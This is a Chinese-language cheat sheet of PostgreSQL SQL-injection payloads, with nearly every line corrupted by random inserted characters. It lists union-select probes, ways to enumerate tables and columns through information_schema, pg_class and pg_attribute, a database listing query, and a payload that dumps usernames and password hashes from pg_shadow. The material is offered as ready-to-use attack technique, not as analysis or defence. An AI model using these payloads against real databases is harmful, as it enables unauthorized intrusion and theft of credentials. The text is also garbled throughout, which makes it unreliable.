结合了MSSQL MySQL Oracle的一些特点
, X0 N y8 {. ]9 h+ O7 e5 U; X支持多语句执行,语句可以没有from postgres用户是超级用户(创始人账户) 只有superuser有copy权限 注释: — , /**/0 e. K# T# f' g+ Y* ]* g
连接符: %20 , + , /**/ 内置函数:
9 t+ @( U1 F" E( Y: zcurrent_database() //当前数据库名/ b- `- B% L6 P- g" c
session_user //会话用户
; O) J8 ^! H6 T# v/ O+ qcurrent_user //当前数据库用户3 O* l( E9 }$ o: W: K
user //当前用户2 R) ^4 j5 q; p! n
version() //数据库版本 Union注射:
4 `& v, V* G0 \( [, M* j4 L# o+ Iorder by n–
' o' a; S" S$ U8 N, _* Y- Kand 1=2 union select null,null,null–( \* k* b$ I4 e2 h! M" N# D; \
and 1=2 union select ‘beach’,null,null–
9 r+ U: A) e/ n0 @; Nand 1=2 union select (select version()),null,null– 获取表名,字段名(新版本利用information_schema):6 u! E2 R& a+ X" W
group_concat(table_name)1 o) R! I. o1 O n# p
and 1=2 union select table_name,null,null from information_schema.tables limit 1 offset n–7 O. m# q! ^& l: o0 H! n; @2 M% s
and 1=2 union select column_name,null,null from information_schema.columns where table_name=’admin’ limit 1 offset n–- ?+ S# M1 c: k v9 j
(老版本)
6 z5 D" F* Z6 [3 S( hpg_class.oid对应pg_attribute.attrelid
7 X) \) ?% J$ z, `. N( Hpg_class.relname表名* o& R# N9 P! v3 B/ f
pg_attribute.attname字段名 select relname from pg_class获取表名0 [- h E2 \, |; A) S
select oid from pg_class where 条件 获取参数
7 G: J: T' y" w( hselect attname from pg_attribute where attrelid=’oid的值’ 获取字段名 实战:1 E w4 c( b8 P/ k3 u
and 1=2 union select relname,null,null from pg_class where relkind=’r’ limit 1 offset 0–加入relkind=’r'只查询普通表
) q4 f7 L4 f5 O/ land 1=2 union select cast(oid as varchar(10)),null,null from pg_class where relkind=’r’ limit 1 offset 0–
1 j) K5 t9 p+ n- a, T! R+ [由于oid类型是oid,要数据类型兼容我们用cast函数强制转换成varchar类型。比如得到1136 and 1=2 union select attname,null,null from pg_attribute where attrelid=1136 limit 1 offset 0–爆表名
$ z; q, F1 s9 X( R======================================================================
7 f% Q3 y" m0 n- v1 \) V. m5 N7 cand 1=2 union select datname,null,null from pg_database limit 1 offset 0–爆库
' ~! l4 {* u7 K/ H1 w7 xand 1=2 union select username||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0–爆数据库用户密码 |